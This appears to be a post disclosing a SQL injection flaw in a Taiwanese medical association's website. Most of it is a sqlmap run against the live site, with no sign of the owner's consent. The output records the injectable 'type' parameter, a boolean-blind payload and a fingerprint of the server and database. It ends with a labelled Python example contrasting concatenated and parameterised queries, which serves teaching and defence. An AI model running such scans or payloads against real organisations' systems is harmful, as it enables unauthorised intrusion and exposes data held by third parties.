SQL injection vulnerability in a Taiwanese medical association's website

Going straight to the trusty sqlmap:

PS C:\security tools\sqlmap-master> python.exe .\sqlmap.py -u "http://www.xxx.org.tw/people/edu.asp?type=6"
         _
 ___ ___| |_____ ___ ___  {1.0.5.46#dev}
|_ -| . | |     | .'| . |
|___|_  |_|_|_|_|__,|  _|
      |_|           |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all ap
d federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 20:17:12

[20:17:12] [INFO] testing connection to the target URL
[20:17:12] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[20:17:13] [CRITICAL] heuristics detected that the target is protected by some kind of WAF/IPS/IDS
do you want sqlmap to try to detect backend WAF/IPS/IDS? [y/N] y
[20:17:15] [WARNING] dropping timeout to 10 seconds (i.e. '--timeout=10')
[20:17:15] [INFO] using WAF scripts to detect backend WAF/IPS/IDS protection
[20:17:15] [WARNING] WAF/IDS/IPS product hasn't been identified (generic protection response)
[20:17:15] [INFO] testing if the target URL is stable
[20:17:16] [INFO] target URL is stable
[20:17:16] [INFO] testing if GET parameter 'type' is dynamic
[20:17:17] [INFO] confirming that GET parameter 'type' is dynamic
[20:17:17] [INFO] GET parameter 'type' is dynamic
[20:17:17] [INFO] heuristic (basic) test shows that GET parameter 'type' might be injectable (possible DBMS: 'Microsoft SQL Server')
[20:17:17] [INFO] testing for SQL injection on GET parameter 'type'
it looks like the back-end DBMS is 'Microsoft SQL Server'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
for the remaining tests, do you want to include all tests for 'Microsoft SQL Server' extending provided level (1) and risk (1) values? [Y/n] 1
[20:17:25] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[20:17:27] [INFO] GET parameter 'type' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable
[20:17:27] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause'
[20:17:27] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
[20:17:27] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[20:17:27] [WARNING] time-based comparison requires larger statistical model, please wait................... (done)
[20:17:40] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e
[20:17:40] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind'
[20:17:43] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[20:17:43] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[20:17:45] [INFO] checking if the injection point on GET parameter 'type' is a false positive
[20:17:48] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between
GET parameter 'type' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 57 HTTP(s) requests:
---
Parameter: type (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: type=6 AND 9449=9449
---
[20:18:04] [INFO] testing Microsoft SQL Server
[20:18:04] [INFO] confirming Microsoft SQL Server
[20:18:05] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[20:18:05] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 8 times, 404 (Not Found) - 27 times
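What sqlmap's boolean-based blind finding means, shown as an added example that is not code from the original post: the reported payload `type=6 AND 9449=9449` only "works" because the `type` parameter is pasted into the SQL text, so a true and a false appended condition produce different responses. The target's ASP page and its MS SQL Server 2000 backend are not available, so an in-memory SQLite table and the query shape `... WHERE type = <value>` are constructed assumptions; the hardened version validates the integer and binds it with a placeholder.

```python
"""Boolean-based blind SQL injection: mechanism and fix (added example).

The SQLite table below is a constructed stand-in for the page's MS SQL Server
backend; the query shape is an assumption about the vulnerable edu.asp page.
"""
import re
import sqlite3

# Constructed sample data: "education" entries keyed by a numeric type.
ROWS = [(1, 6, "Course A"), (2, 6, "Course B"), (3, 7, "Course C")]


def _db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE edu (id INTEGER, type INTEGER, title TEXT)")
    conn.executemany("INSERT INTO edu VALUES (?, ?, ?)", ROWS)
    return conn


def vulnerable_lookup(type_param: str):
    """Hypothetical pre-fix pattern: the GET parameter is concatenated into SQL."""
    sql = "SELECT title FROM edu WHERE type = " + type_param
    return sorted(r[0] for r in _db().execute(sql))


def hardened_lookup(type_param: str):
    """Fix: reject anything but a plain integer, then bind it as a parameter."""
    if not re.fullmatch(r"[0-9]{1,9}", type_param):
        raise ValueError("type must be a plain integer")
    sql = "SELECT title FROM edu WHERE type = ?"
    return sorted(r[0] for r in _db().execute(sql, (int(type_param),)))


def differs_under_boolean_probe(lookup) -> bool:
    """sqlmap's boolean-based check: does a true versus a false appended
    condition change the response? If so, the parameter is injectable."""
    true_probe = "6 AND 9449=9449"   # the exact payload sqlmap reported above
    false_probe = "6 AND 9449=9450"  # same shape, always-false condition
    try:
        return lookup(true_probe) != lookup(false_probe)
    except ValueError:
        return False  # input rejected before it ever reaches the database


if __name__ == "__main__":
    print("vulnerable injectable:", differs_under_boolean_probe(vulnerable_lookup))
    print("hardened injectable:", differs_under_boolean_probe(hardened_lookup))
```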
Time: 2024-10-29 04:12:04
